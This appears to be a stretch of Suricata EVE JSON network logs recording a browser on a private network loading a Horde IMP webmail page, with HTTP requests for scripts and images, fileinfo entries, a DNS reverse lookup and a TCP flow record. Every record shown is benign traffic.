{"timestamp":"2020-02-29T00:23:13.563141+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/contextsensitive.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3855},"app_proto":"http","fileinfo":{"filename":"\/js\/contextsensitive.js","state":"CLOSED","stored":false,"size":12330,"tx_id":1}} {"timestamp":"2020-02-29T00:23:13.566870+0000","flow_id":1779901807041841,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52976,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/tinycon.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3108}} {"timestamp":"2020-02-29T00:23:13.563707+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/passphrase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":490}} {"timestamp":"2020-02-29T00:23:13.569736+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52978,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/dragdrop2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5927}} {"timestamp":"2020-02-29T00:23:13.571705+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/passphrase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":490},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/passphrase.js","state":"CLOSED","stored":false,"size":1009,"tx_id":2}} {"timestamp":"2020-02-29T00:23:13.572319+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13568}} {"timestamp":"2020-02-29T00:23:13.574621+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52978,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/dragdrop2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5927},"app_proto":"http","fileinfo":{"filename":"\/js\/dragdrop2.js","state":"CLOSED","stored":false,"size":22457,"tx_id":0}} {"timestamp":"2020-02-29T00:23:13.574974+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52978,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/jstorage.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4195}} {"timestamp":"2020-02-29T00:23:13.577326+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpcore.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3881},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/dimpcore.js","state":"CLOSED","stored":false,"size":13894,"tx_id":4}} 
{"timestamp":"2020-02-29T00:23:13.582471+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpbase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":30030}} {"timestamp":"2020-02-29T00:23:13.584270+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13568},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/viewport.js","state":"CLOSED","stored":false,"size":58788,"tx_id":3}} {"timestamp":"2020-02-29T00:23:13.584818+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpbase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":30030},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/dimpbase.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":5}} {"timestamp":"2020-02-29T00:23:13.585514+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/js\/slider2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2408}} {"timestamp":"2020-02-29T00:23:13.588348+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/slider2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2408},"app_proto":"http","fileinfo":{"filename":"\/js\/slider2.js","state":"CLOSED","stored":false,"size":7582,"tx_id":6}} 
{"timestamp":"2020-02-29T00:23:13.588817+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/js\/dialog.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1316}} {"timestamp":"2020-02-29T00:23:13.592254+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/dialog.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1316},"app_proto":"http","fileinfo":{"filename":"\/js\/dialog.js","state":"CLOSED","stored":false,"size":4046,"tx_id":7}} {"timestamp":"2020-02-29T00:23:13.592593+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/toggle_quotes.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":502}} 
{"timestamp":"2020-02-29T00:23:13.593849+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/toggle_quotes.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":502},"app_proto":"http","fileinfo":{"filename":"\/js\/toggle_quotes.js","state":"CLOSED","stored":false,"size":1054,"tx_id":4}} {"timestamp":"2020-02-29T00:23:13.592875+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/imp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1763}} {"timestamp":"2020-02-29T00:23:13.594116+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/base64.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1962}} 
{"timestamp":"2020-02-29T00:23:13.642877+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/imp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1763},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/imp.js","state":"CLOSED","stored":false,"size":5736,"tx_id":8}} {"timestamp":"2020-02-29T00:23:13.685357+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/popdown.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":191}} {"timestamp":"2020-02-29T00:23:13.744096+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/popdown.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":191},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/popdown.png","state":"CLOSED","stored":false,"size":191,"tx_id":9}} {"timestamp":"2020-02-29T00:23:13.744418+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131}} {"timestamp":"2020-02-29T00:23:13.766355+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidevert.png","state":"CLOSED","stored":false,"size":131,"tx_id":10}} {"timestamp":"2020-02-29T00:23:13.768362+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; 
rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":478}} {"timestamp":"2020-02-29T00:23:13.770424+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":478},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reload.png","state":"CLOSED","stored":false,"size":478,"tx_id":11}} {"timestamp":"2020-02-29T00:23:13.775452+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":340}} {"timestamp":"2020-02-29T00:23:13.776683+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/base64.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1962},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/external\/base64.js","state":"CLOSED","stored":false,"size":6586,"tx_id":5}} {"timestamp":"2020-02-29T00:23:13.777482+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":96}} {"timestamp":"2020-02-29T00:23:13.777995+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":96},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidehoriz.png","state":"CLOSED","stored":false,"size":96,"tx_id":6}} {"timestamp":"2020-02-29T00:23:13.778444+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux 
x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":340},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/checkbox_off.png","state":"CLOSED","stored":false,"size":340,"tx_id":12}} {"timestamp":"2020-02-29T00:23:13.794129+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":97}} {"timestamp":"2020-02-29T00:23:13.803596+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/ico_message_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":468}} {"timestamp":"2020-02-29T00:23:13.804330+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/ico_message_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":468},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/ico_message_off.png","state":"CLOSED","stored":false,"size":468,"tx_id":7}} {"timestamp":"2020-02-29T00:23:13.804922+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13593}} {"timestamp":"2020-02-29T00:23:13.810002+0000","flow_id":2045141807356946,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":32775,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57668,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:23:13.834778+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":97},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidehoriz-bg.png","state":"CLOSED","stored":false,"size":97,"tx_id":13}} 
{"timestamp":"2020-02-29T00:23:13.921148+0000","flow_id":2045141807356946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":32775,"proto":"UDP","dns":{"type":"answer","id":57668,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:23:13.921148+0000","flow_id":2045141807356946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":32775,"proto":"UDP","dns":{"type":"answer","id":57668,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:23:14.000285+0000","flow_id":461862238728569,"event_type":"flow","src_ip":"192.168.10.130","src_port":34264,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":2088,"bytes_toclient":1452,"start":"2020-02-29T00:22:04.110969+0000","end":"2020-02-29T00:22:09.135688+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:14.006648+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":954}} 
{"timestamp":"2020-02-29T00:23:14.006648+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":954},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":14}} {"timestamp":"2020-02-29T00:23:14.040185+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":954},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2491,"tx_id":14}} 